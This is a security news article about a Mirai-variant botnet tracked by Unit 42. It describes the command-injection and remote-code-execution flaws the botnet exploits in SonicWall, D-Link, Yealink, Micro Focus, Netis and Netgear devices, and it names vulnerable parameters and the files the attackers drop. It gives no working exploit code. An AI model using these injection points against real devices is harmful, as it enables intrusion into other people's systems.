Newly Discovered Botnet Targets Network Security Devices
The compromised devices are infected with a variant of the Mirai botnet malware.
The newly discovered botnet is targeting connected devices affected by critical-level vulnerabilities, with some of them impacting network security devices. The attacks are active which makes it look like the attackers are using publicly available exploits, sometimes only a few hours after the vulnerabilities were published.
What is Mirai and how is it being used in this situation?
Mirai, translated as ‘future’ in Japanese, is a malware that can turn networked devices running Linux into remotely controlled bots, that can be further used as part of a botnet in large-scale network attacks.
Its primary targets are online consumer devices such as IP cameras and home routers, Mirai being initially used by the creators to DDoS Minecraft servers and companies offering DDoS protection to said servers, with the authors using Mirai to operate a protection racket. The source code for Mirai was subsequently published on Hack Forums as open-source. Since the source code was published, the techniques have been adapted in other malware projects.
Hundreds of thousands of IoT devices use default settings, making them extremely vulnerable to infection, therefore once infected, the device will monitor the command and control server which indicates the target of an attack.
Exploit code for at least ten vulnerabilities has been leveraged so far, the latest one being added over the weekend, and almost immediately used.
It looks like the attackers are compromising devices by using a variant of the Mirai botnet malware that is specific to the architecture of the device.
In February, the security researchers from Palo Alto Networks’ Unit 42 discovered attacks that came from this botnet and therefore started to track its activity, in order to find more about its MO.
It seems to have taken about a month for the botnet operator to integrate exploits that could be used for ten vulnerabilities, most of them critical, therefore being able to reach various targets.
These vulnerabilities stem from user-provided data not being properly filtered and allowing an unauthenticated attacker to run arbitrary commands on the server with root permission.
The researchers declared that three of the vulnerabilities the attackers exploit have yet to be identified as the targets remain unknown.
Let’s take a more in-depth look at the exploited vulnerabilities.
VisualDoor: SonicWall SSL-VPN Remote Command Injection Vulnerability
This exploit of SonicWall SSL-VPN is aimed at an old version of Bash, a system that has a known vulnerability to ShellShock, therefore, an attacker can send a crafted Common Gateway Interface (CGI) request to a particular shell script, thus creating an unauthenticated remote code execution (RCE) vulnerability.
CVE-2020-25506: D-Link DNS-320 Firewall Remote Command Execution Vulnerability
This specific exploit is targeting a command injection vulnerability in a system_mgr.cgi component, making the component not able to successfully sanitize the value of the HTTP parameters f_ntp_server, leading to arbitrary command execution.
CVE-2021-27561 and CVE-2021-27562: Yealink Device Management Pre-Auth ‘root’ Level Remote Code Execution Vulnerability
The exploit operates by chaining a pre-auth Server-Side Request Forgery (SSRF) vulnerability and a command injection vulnerability, in this way creating the possibility of command executions as root without authentication, by sending an HTTPS request to the remote target.
CVE-2021-22502: Micro Focus Operation Bridge Reporter (OBR) Remote Code Execution
This works due to the “username” and “password” parameters in requests made to the LogonResource API, being “unsanitized’, and therefore allowing the vulnerability to be exploited in order to allow unauthenticated RCE as root on the OBR server.
CVE-2019-19356: Netis WF2419 Wireless Router Remote Code Execution Vulnerability
An exploit that uses RCE vulnerability in a diagnostic tool utility, by allowing an authenticated attacker to perform command execution via multiple vulnerable parameters like IP address or domain name.
CVE-2020-26919: Netgear ProSAFE Plus Unauthenticated Remote Code Execution Vulnerability
By targeting specifically debug web sections an attacker can execute system commands through this vulnerability, due to the lack of proper checks on access controls leading to RCE with administrator privileges.
Aside from the above-mentioned vulnerabilities, the botnet is using, a few more that are for the time being unidentified are as well exploited. Some of these are, lang parameter command injection, key parameter command injection and op_type parameter command injection.
It looks like after successfully comprising a device, the attacker is dropping various binaries that allow them to schedule jobs, create filter rules, run brute-force attacks, and also propagate the botnet malware. Some of these binaries are lolol.sh:, install.sh:, nbrute.[arch]:, combo.txt:, dark.[arch]:.